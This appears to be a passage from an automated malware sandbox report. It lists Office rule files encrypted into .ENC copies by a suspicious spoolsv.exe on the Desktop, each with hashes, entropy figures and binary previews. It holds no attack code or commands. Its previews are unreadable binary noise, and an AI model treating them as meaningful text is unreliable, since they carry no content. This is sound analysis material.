                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..D.>r....37.J3...Zg[~.....,....I.$.F.L.l.!.X,K..#wL..S.....Z.../v.FB..p.......+...X.6..T.U..H..z..p. b.'L#9V..U.&v.?..C.\'.mN.g...?..e..O#.XI..uY.`..q='..C\<.D...{^.*.Z.......p....M.#......... ...1....6O_..5.0..PqO..[..l~.L..UA6*Z...e|.W.?...Y.+....N...Z\....3...)xo..0K....u..p`.g.44..z..P.KY7....eO.Ko.h....q..D..|....]a..p...e..-.R@'.....v...u[?..K.{b.Y...EJ..~.=..c.p....>.P...FX.=A.0..c~.NTo....*M.fI!.._.hz..?A..G..(?.>..A..;.......A.....j).l..B.l.....^.?...T...~3..)}.rG(...{..I.S..!..&...g..\sM....!.........HE&...`*r.e..0.b.<.......Q..[..DUK....k.B....d.^.y./.g......p.......E...^..1.oc.v.K....4......../4......5...Ox....9~R.. @.B..'.o(3f .t....P..K.}...........F3[.y.y..j..7.T...|.W.....O..fE.E....".m.j......X.....0.%.m,Z.H.|.3.I..+..V.V.U.5?...*.. .S.....N....P..Qx..Y........|.$.F.....J....Y..w3A..E..;Nw.8].....(.s.K.2.k.e.......^U..M..M..s..#..A.............Ni.QW..t...OR..tU.|.&....KCE...D.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703850v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.8697445562900725
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+dbk47IhJ3Lter7NnVhlnBYExo06WGvV4QCdM9Ibs5qkSlr6VQV2a5FuYUEvRQ3q:+Rf7IP7MrBn/lnT69m+cs0kq6VQcuuJm
                                                                                                                                                                                                                                                      MD5:D29809C511199EE56E05B902EACE5444
                                                                                                                                                                                                                                                      SHA1:FB7929872E39BB34F2F250357290DC3395338AC7
                                                                                                                                                                                                                                                      SHA-256:01CC6484FE4EB7A035416A73CA2AE2B922898FA03EB9B19EF02340D1C4B6767E
                                                                                                                                                                                                                                                      SHA-512:B5EE434FBA988DB014D2BE0DECC4E4733DC5D96298B2DDEB6CB9AC84FC8F97F7C9EC4942CBAC245D0AE863410C4B82ADD97E601CD25FFFA3FB2327CD264AFC8D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.I=BX-.g.M..gn....I.M.....*.................P........6.j.....-....s!.5..........'.6...........)W.JD...........{....W.@.P.]v..]..^...i.VfK..0..^.M.C..%?m*.Y8...`..0).......R.0.M..Wh..?..8O.R||.....j.q.)..f.ER.u....:...0.......`..s..L$#...+..uW.[.. ..0P.....hi.rcF....J{....V..S.LTx.....W.....j=..&.J........i.[.j03."..........Md.&]\.'Z.....>Wf..l!,U...j Ye3.D...u....o.N.g..=..q.F.DYy'_...z._N................h.Wg.3...+.{...X..Q..XXte.3;....U......-<...o.Y...H.l.x\S.y.K`.....yy..i0..l.C.OKg.2.o..T....[g.....Q..l..ED..Y|)x&......9.X....Cr.s......s(..[..P.M.....5....".A'........n;.P.....p...+Kr%.a.A.......(..`...I.}.F..8....@V.h.Ut~;.p..kZs.8...Q..^r.. m..'..v..e&......]........^...,K.EB...J...>...|.#/@..U..1.jk#I}z}...j8\.a...e&%..d.#.Lmn........2.|%..A3.}{..]-.}0Re;...jQ..S/.U.Z..#.d...,;.<\*...'k....97^..J..B...p)...!...h...U....._.V|....z.s....=?5\..fP|e..............?.]CL..Q..m..6H..&

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703851v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1456
                                                                                                                                                                                                                                                      Entropy (8bit):7.864701797592367
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+t0WM96GDs18HEvuUiTWH/MtgucxiTIZ+vnrCyWF6C/D8eaoEMRRJIh/P4CfvLDd:+tsDO8HEdiTWfZuGiz/+V//DFkR/P4et
                                                                                                                                                                                                                                                      MD5:ED54071890CFDF48C5DFBD7AFED5C3B8
                                                                                                                                                                                                                                                      SHA1:27368B6EA41F5DA33426474F7C32BE3A36C23E7A
                                                                                                                                                                                                                                                      SHA-256:0537522F1744164EDD05CAFE48FFBEAF038730CE7DFBC2E7B90550D07E64A034
                                                                                                                                                                                                                                                      SHA-512:0A8D26459CC6B0F11EF825AA9C8FA0C4860E94C696E0474A4FF0D799448C0A07EA8E9299FEF3574CF308F73665BC8837B44C2A0455B06FD43EC59FA9F2BD53BA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.;.CSC....y`.HAA^C .7`v.*....S.......x..|[...{k;.>/LQ..4.J.... w.:gQ.SC...j.....7.mM.e.v,u.....!.(...F...9.0tI_..I....e..b..PX...!...w....e..q=..H.....y....P........~....m.^6...qv?.M....n...>......L..g.>.tt....c..#E..;?M........p.....c....<?....{T..7.M....%........q{.U..........q...rf.I.<..y..kS\...@V,0.5,.R.!%.... N.mG......W........xeIN.{3@.-)l..\.VE...D.f.i..y.fm...O>[1..!Y.'.C....|r.G...]J..g.;E..:t.v..B...6E....l.......<j....[..z..K..j.$c.uJ-./.m..QI..a..q....y..{:.K....]..b...=8.c..#b....._.P.....R.z...z.......{...T8.h..D....SF%.P.q..<.....r./`.n.!.. \.Y..g9..E.V......[.o.L9.o...,..F.Z*...<m...a&=HI...../q/!....JN........Zw?.q......w.d.....!.m..d.,N..t...D.cm|s.%...m....W%Ze1.sg=.....c..7$..sCL...#%9.....#DA.>.:.Kix..WU.L..$.LP......U....v].e..y3'.S........nCO-&..a.ICO..0.GG.x.Q.C3C.F..|.GK..y..,m.Rm..<.....),..(..7D...&|.?...d?,..Q..-`R..KK.v...ydr}C`.<.Yn'......-..'E..>.O..+.;%r....Q+....w..... ..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703900v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.878686200459582
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+LoIqz/jZdjGZyu63+uLbtW3OT8+5aI9ouWpwAI1TKuHLLB80kmV:+Bqz/VdjG4u6uuvtW3S829BRKYvBB
                                                                                                                                                                                                                                                      MD5:935C5A795F7C00CAE51487BFFA54F0C5
                                                                                                                                                                                                                                                      SHA1:12633B9CC236470ABF90099F889B8FBF4101FCBB
                                                                                                                                                                                                                                                      SHA-256:2D9A1A34E245EB8FCE01DF8A639D266FD3202FAD5AFA1383DB25CAB5222D9BD0
                                                                                                                                                                                                                                                      SHA-512:0FDAFF223BFD45003E06D86C08B43A6B1C9C6A5F140AAB7427488F791864C534FFAAE67FD147B4EAC23AA8B7072D9C35B058BC6AD1707C134E22F501AD0C6A4C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F...,o....|.@q.g.Bz~x..s..y.........{.i8`.=.zN.W..<.5..s...O..l.!.r .!....m. 8........y.....Sf.SV.W.Z.)v....X..m.1_J......aXZoSgy....*..g%..a....(Y..~.:,3].....{]Ca.A.x.....<..jn.E._..0...\.$.GI.X.k.....V..%.sg.o?.6fd...v.[9..T._........i..'...ul.....R.Y.E...k.I%....J.'<...FR.....w..<.Y*.....-V|.D.~......f.T....2.'..K..H.?......I......_&....>C.....%.r..9.'..x..BX......*.g.l[..f&.rj..).".&...xk..}..5?.D..2]8.fE..c&VGO.....G..yY.h.B...=?......K....H.=.`..a.5.....1......e.rR...6.iR'\2....O.O?......Lo...F&..X..~S!.g...w...".../g.|.."9r.f.... ..&.4.F.....;i....1?.>..M(...x.}.o......KBR*.n.......T...@!..-.(y.,..u.[~c.....(...o..4.3d_. 8.V.T..d..6.R.R>...T/.......f.....YBW...L.f...RZ.V+.. g........h.C..+N...'.......}#..7bvx.7....|5.....].~..:....D.Y...i.. ..g...%..L"].........v..6../.d.m..7r.g..hyl3.x.......PX.=u|..U"..#.8.....~SP..d..|......;F..J.A.r..Z.8.....~...c....ONy....E07.@.[08.mww.?.4.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703901v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1440
                                                                                                                                                                                                                                                      Entropy (8bit):7.8608079467260215
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+iM45WI+gro4qc9C7ucKLeMM7JJnlDh+zWkKEAehh0M3oK/whnCE0j0icNDTfSKe:+iMiWI+RZcgYTQ3lDh7ELO+0CNj07Vfu
                                                                                                                                                                                                                                                      MD5:BFA83A9B1D7ED3B5D0ED1404588F62B2
                                                                                                                                                                                                                                                      SHA1:9B2F35BBAC2781CD83ED9B7ADA4E272043CB44D0
                                                                                                                                                                                                                                                      SHA-256:9A29B09D9EB7DF509F4DF33457D59FA2ECAB9BBEEFD79F216093DB0AAA5331EA
                                                                                                                                                                                                                                                      SHA-512:0735DEA3CDF4006398204B5C5D63DB22B899D32F6011F5C44F77FD94203874DFA95BAD54FDCE0ADC70DF80A1444DCAB3B1532F1927EE8C4AD2E365F8645D29B0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..;A...n.89.......X....q.d......W.+{.)...jQk...5./..tp.+~.....`..S iM3..].9.x.."v%#...C.i#,...Y.H.-.M...1.`./c...w...D..SV.....mju...]D,.`rr /..`.g.......s#...Xr...&#.....a.....4.E.;-..A.d.....8.pzt.C..]......y....l..yC.....E4....M..]-_v.L...r.......E|.R.".p.....1.y.d..gIU7..FD).i.....$t3h..Q.saZ.T.*8....2.......pX.5|.-...\..A..o.....Pt}.i....ZC..........w......p]iH.....~q&Ik..z.j($`.'%.{.K./...Jo.G.....r..n./\t.=...N...5..I".5..#...^.......a.x7Q..5.$.zr.....o.....+#.,X4..7.l...e...{~v........9.'.a?/u..V.f@.dp.gwe.3.(.?..1s..*....,.....aN..GM.)5..4..="M.Sd......0.i...r_CP.. .7.>y}.P......\.'..*).G(.mo.C.A.A?..}..}.... ......4..q.6.....NH%=`..;pv.j..P}....Rq.E..og.:.......l!.<..:.......q.W.....T..E.~>.r..T...S..n$0..:.S.g..P.........~...V..Q4.........T.J.r.`.o.6"..l75..b...}%Ma.q.{.R.,.5'`x4g..s..u...... #..Z.$.K&[.F.;a%.......A).M.....e........&5m.=.......g..[..<.<q.|.t..E&s.2q.#.}..[.H.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703950v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.868376745525522
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+fg3zHbI+KKs8CX7nt7DOY/zREdz0kZiXMFUp/VNyvVuNHFoQvCe1fB:+Y3z8+KKsLhDOYyWkZiPp7yNuNHFoQqW
                                                                                                                                                                                                                                                      MD5:650483B61637F91699CDD4304C9F93B0
                                                                                                                                                                                                                                                      SHA1:416C48582BA0352B5E2B9CF85CB2A9F72C7775D6
                                                                                                                                                                                                                                                      SHA-256:08CEB8C105CC41A47F2DCC798B08CCB026740B1741DA6FC8C7B0A41E7D5E59A7
                                                                                                                                                                                                                                                      SHA-512:B5DA0F49F39A92C2E5A7878EC31E3F7F5BB05DEB339FB958508CC379F5CAF02255004927D3C6C8D2B2B97C7266E66E0F44C8F74A7624B0FD476E1447A8D730FF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.T..4EB75."..NI..n.$..T~..Wl.K.1..gR..k7..! h/...Z.+..#.=....2.'.g..73..s.m... ..vb.......<...Q+V..a.K.......m.(..1...{.,........b...2....DE.@w...}...!...Dm.....m.a<U.$.5....C0-...w>.Q.................._...a.."..C..M....d.P\.x.@Q...}{J...,.Z{..5w..Q0..5......qbn.?.^T.[`..3..~:..z..u.n..tQ7..$..k...k{.....G.t..Z.'...}.N..t[ei.v..l..Xh..`..)..1.....W.'..I.N....>..}E..g..M.X...sLg...[.J4..({.A.G.x.... 0T{..)IP.w.X........~.T.0....F.Q..B.@...>....E<.o...L...n ......KGm*.....SP..]s...|..|......H..)J....~On....s.*..7..2.[..X.R..>..R..\]6....0-....}..i._.#.....}.w...[43T.N%...........@..V..*....Wr......B..Kz.!..i....eF...*....}eIDE....RU.Ap..1.~^$.....N..x.l.+F..i...(d.v.....Y......sn...j....& u....>>..(...tu......^..n..If.....IF..w.....&9.r.....*?..........7.K..k...@s'k..4...|.&.../.AX...<:.h....S..{.V.....L$.r....1..,T..0}o8`*....M...v....pc.\..c.~Y".w..E..`..l...1....B...ALp..C...<t.>..m....\.A..N..u{...M

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703951v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.8424979538652515
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+d0P7ViwFqfreBLQQoy7I7HAvU5MKuwLcbkteSkxdO7tyoewB/hAm2gX9r6E4R9:+SP7ViVreaVGI7gMuKuHYsDn4Gm2gNrA
                                                                                                                                                                                                                                                      MD5:1A1C3F999228EC0184D1E0F112645AEC
                                                                                                                                                                                                                                                      SHA1:29B8CECA89579DD2C6F2A6CA29CDDA1E3728168F
                                                                                                                                                                                                                                                      SHA-256:CB45AB23FCDCE10595523375647DE27E06FC596E938C7843B2201AAD37FE901C
                                                                                                                                                                                                                                                      SHA-512:EA1D18A18762B7A63588BF435DF85F0705649969245E8F33ACAC3C856CAB0FF7D9480BF61D1DD68E8AFA408E0CD9B348606402F268B326F69F5E130348287333
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.dqZ6.f......3...`Mz..../'d.\....L...nI4.q..`~P.a.d...... ..N.......Y..8.y..7j.r.-....2r.......Kl..D.@8?...H....cX.}.%....w.......((.V_'.r.7..........\...>...d+.....#m..&}.H...V.|.z.[.>.*{.f....J..d..h3.da9`....{...& ...9U..Y........./..-.+}..C6hm..X5t.].7y...6l.....]..-.J?... L...Z.(.J+...T......_R.8.j.$y....-%Q..F.yjaJq..y.?.....s.{..@D.....e..^....GCV..9.<..8....@..C.8..h...p.....;..(.`..)...)....V_Tk.#63;....[_;e-.m<4....uY.<h:.|...}7^.&b...m{...."...6..Q3l9.\.bj./v...0...@.q....*.2\..o.3./V..}QPxk%..tD.z1.........`.t...;...k./.n.^..Q...M.y.......>.!~,Lc....i..J..X....N.]j..$..xn)#gz-...o.K..u.....e.`.=_md~&....]/.K.2.!.8.^Z.#.m.pX....i.....x...\...=.7}.`.jGI.h.......m.|.H..4.+!.x.m.c.m.5.._.Z..M..V.6._s........;n1...;|..Y.~.c..kZ]X...../..n.-.p[....`O....V.......z~k.E..QT;.1....8.s..738..$....R..gl........g8..c/#.R.zvlR.20..%(....p..c.0.....x..L..;.-..D..V...c...(...m.X..?..-..z..c.Z...MF

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704000v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.856524051360238
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+A2aOax7PvjxHaxAzlvC9q1+5wnFhf+Hica0NbIia/kW+NeMg5zrm4TJ1YN:+AbV1PbnC9g+KyCIuia/kFeM4m4TJ18
                                                                                                                                                                                                                                                      MD5:06C7DBCBCE6A3CAE85DC96D750A32A73
                                                                                                                                                                                                                                                      SHA1:70E0700B141AB7516472E60AC67C1DD5BD5B4DA3
                                                                                                                                                                                                                                                      SHA-256:8997B4AC9DBABE2487F53DDBBF54AABEE234299F8A8E14C79DF6546796B5571A
                                                                                                                                                                                                                                                      SHA-512:265533D7EE7CA1507A972469210BF42237EFFD2004BFC832B25977CF3FBBC393AA660EEF218B77349E90A733F6F85238572183DB0A69282E960D76F7370C5C6A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F...>.$.;/......%....*...U....!......mB08r..l. ...m.7<.#l..P..^\.Cg...&x.....#...].I.?..A..JJ!..nI.[..R/..t.......4..m.[O.(..u7..CX..4..:r..+.........7.S.n.C.^.e..9~."."....j.,...c[+.....e;...3...G/f..X...gPa.Po........R...X.y.........C..;I.. ......L<.t.....W..v..b.w.5um..z.Qb.a.M.Y.pT....!A.......(...)...8.d9...6..+./J.c".>..q.E.....^....@....K..Z&5@.q.6I..9.m...5..<.fe...JS....u\d..(j...*.aW....I.;U.n.....8i.y.N..$....*8...c...-\V........P....j|..M=.D....I.}F.S#.t......p4...%d....M..:Q.....Z...Z:}.2..........fx..}TZ..p...4....._v.SG/.G..M$.2x..X".'2m...........&.1.{5j..a..Km.0....?_...7G..6Q./..W.v..NCO+.?.E|.y...._)<.$....,....-%S.....Pg_..j/P...]A..;W.Y...'...:.....--}.,..A..5.1.>-.u9..#.v.t.@..;e*FH.. ......6.z.[.....]....z.tO.\l..Efpl.u.....O..H[....2s..\... ..[.J.5=....}.6q.;0bk..LM.........pM..j..A.x...J...... .X..|s.v.....F..d...I.u.....L.x$......L..n(..z.L.|.....S......O

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704001v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.875737169618834
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+hBdZ+1IkKWJqPWrYWkBiKTSL+5m1oY3H7rigZRCWLX/0vpJ89FDSHr12N:+hh+IOrIRGf3HicD/+J8vs12N
                                                                                                                                                                                                                                                      MD5:7E54BC5820FFB531B644AD770A7B7083
                                                                                                                                                                                                                                                      SHA1:302E053DCB14FE736BF61015ADE58AAC0EF78E9E
                                                                                                                                                                                                                                                      SHA-256:3FED9875721507FD96D68D9DE80AF59D6C3B155392D862916C2CCC4D27C89917
                                                                                                                                                                                                                                                      SHA-512:A8077053CF2D909A2D5FC4D7AFC9AEBE4484E3A339DA37F05E56B0FF9D9B6511189B83D556FDA074CC8B5717A1A0017A40AB67EBF56E540BAFF091686A9854A8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.A..e...wG..>C.O..m4,Bl+..N..9Ml...4. .m|...G.......9k.6..FRs. ..G...SGWd(....a.=.-.t....K6.;.[&...@.<...R.._Yq.].2F.l.....{h'.......~In.D..5b...q...]..'..p.2.../..._..w.r..v..L.T.vk.y...'.A..e.>I4....w.B@.......l.f..W..'.`..k....L....$.{X..G....:..T#Y..<b..r...z..p.....B.....+..i.HA..2..U..5.0...*`8G.......?..........Pr....f...x.{3.......D......|dZ*.+...I.....h....$.].n.."T...C9..D............k.._4...Y..ou.>k.D..DQ.....Y[..yB4P<.......W.R.Y=.,.*..Y.wR.../...pU.z..t.......r.....Z..V..qd...6j. ;n....J...I^Eb.$..'....)..U3..1...[..-.....WJ.\rE.gf).)o.A.c..p....y5.X..........BOxuL .wh.LN..!.....g..;Y.T,.8)..I."..~..M...):.........}.....)g.j.5...'....f.8.<..z.t...m..a..>..[...#..6.v>...\.d..".'. .=.ff.dh.M.]t..N..Q....-.*...y....]...#.g..@.)....Q ..Z....\...fq1.....:..o|...(..q..p....F....X....h..<...'...4....4./.YT.|.J.Z.$..~.K.'.Y.'.I..+.$.>..`!,.~..~3%ih.1y...f....[.k..S?I7-....L\...M.8...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704050v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.880153991846477
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+9h6AVr2Py4aTPovZ9zNNDdi8jIkIzbMMS2X2bJwe6fm7WJ:+ZVeBaMnLdCpzbTHmdwe6fm6
                                                                                                                                                                                                                                                      MD5:EFB7DE37444995B9D695E074FFEAD9CF
                                                                                                                                                                                                                                                      SHA1:570F30AEC3F7EAF695E663D77E54FB77A96514F1
                                                                                                                                                                                                                                                      SHA-256:F3D9BEB6AFA246461AAF8A00172AA3856241989DE8AB67E84065866FBE69243C
                                                                                                                                                                                                                                                      SHA-512:F116D231F645465F627713495FA67C2463219656CF7ED5395918834FFDD2CB407DC06872E230004A81EABD09A7D8F2491172478F289022F6B810B2B8031E7C62
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F......-&Y......2k%68-..)[lt..s. ...rB.!/;'?M..L.P.-....Q8..ig.Oa'm.....B...^e.t.8...F[\.Y.$.R..<.q....e.p.h.A.....#....o....P.R....zMs..Xv...Ju..&.XDK.dq^XT^.<.........s@.....s-.9..\......})...1.....R..........=T.2..+...s2=....z G.....Z..@y...........Hgm.xKW..._q....]...g9.>}..........<D....(e.o..!{.X..^..*;9....97.s.p.J....d.$.5.7ld....J3Y.8..A(......U1N&.8..8.Y.a8.........=..D..;.u.T4tF..FJ...d..%k..........,'{..8)..~....>.0.[.W..}...+...Ai. zt.`.e~.".O.-.42}.Q<....<....L,%...a...^.B............sS../.j?+..`.[..p.......a.j5>.KA.8+..F."E......h;....<...P#.....)0I.[7..'.P..ij.....I{.......ej..|.U..".(k....^......i3..|E.QE.M..X&...O%...[..X2..8.2.S.t2....Qp.......2/$..Z...'pw....Rw..e.......Bf..-..o8..R....>....7.y...n.o).....+.........sTS |...}.j..j.~........o...|.....,...V.y..$.Q...U.%...5.ty.f}.a..r...e..?.)..8z...O.-."....,&i.....?......U.'.:.)bh.....r..".;k....\..0f.....f.e.f.J^7.E.....CQ:.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704051v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.857957049697692
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+z9y6xNvDyDSKcbzFHbkc3LnifRZ8Ei4/I1mEWBSBVQiyrH7loz7ksXbEQeG3JvH:+YANWUtLcoVwgm9BSO5oz7rbEQeG3JvH
                                                                                                                                                                                                                                                      MD5:1E18843AF39468BBB5FBB4397297F87F
                                                                                                                                                                                                                                                      SHA1:6AC4D05D5CECFE865C1890C6A8D2E1D60A4611E6
                                                                                                                                                                                                                                                      SHA-256:E54C7EDB8D0B7AE761B5D2E59D9D1CC5F15B6D27D98A77B01554914B4251AFAE
                                                                                                                                                                                                                                                      SHA-512:DABFEE824ECBEE938F99076EDA40443AD5665D676B231CA8161414F0715EABA1701D5334E53E75DF956107D62AB2BDC5AD022075B0360BA2903E2CB64AFD1577
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.......#.T.m:f.d..<..0qB.!..c......c.]....d.VrW....6..D.&.F\...7(..h..^.i...`c.~.r...h.Q...F..j~.lC......B.+.,n~.9.b..WG.:$h.V=2.B.V.o...{%....1....x.......j...0..Q.u...`.w........k~qmX....x<X...}..R..yl..V.j..?.....dQ.....K.9.i....*y*?L..B..wr}.C....VN`..9.7[Y...C....._.G.............Z........R.c.NqI..,....`(.....n...W..u..........}>.....y.......#.PiH..5.....Cz..}.9..:..U_..?....H@nO.... .Z..Y.<.=.a)h..'g......oG6!UG...|.R3. :2j..p.].Pi.0+|6(M..Y.b..Q.n..X-..?..cO.......c..T..U...i.N../.+..\..9~......d0..b...[.]].....!.).5.g.7-.F.JO./.Y!-[......1...;..k$.../.lx.9me5.R..i...^u..Q!.0.....k6..n.....#%..K.d.&...K...7.'3E..8..?...zD.....}.....G...\.;zC.E.rJ..mU.}. .i.s.|.M.F.Z.."E$N....Z,..Q..D.U...X...............Xq..Y...Q..b.#.6....P.SS.J..U...w..e@o.^.....R.....{....g.\$^.P.................<t.{J...R.) =.0..B........i.;.xQ..........V.....*j..?.Ph..I.v.c.........R.V..t..V.;.?..Z.=i.2.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704100v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.860074006646684
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+MBNvEocYBaCh+EZSwencXiXmI2DolNHX2AYrk/en4089f/pKDEZ:+MBNklChIcyeojdYY/enE/kDk
                                                                                                                                                                                                                                                      MD5:596238C2B750F234A7DB7973AE5FE40D
                                                                                                                                                                                                                                                      SHA1:98D9B3CCD405A0BC79AE5C47C937C7C028059D07
                                                                                                                                                                                                                                                      SHA-256:702EFEBA4A8FC18BA06195C5F19A0C08345A6C0F735298D03CE834A258DDC6E6
                                                                                                                                                                                                                                                      SHA-512:336C6EC927D629B5F0E7B88E74DE1D54FB78FE56605629EE207043D313B927A170E9AB90262E0C0CD9A1126E58302479DBCB2EB0D9629587E3D1DC21CFEFFDD6
                                                                                                                                                                                                                                                      Malicious:false
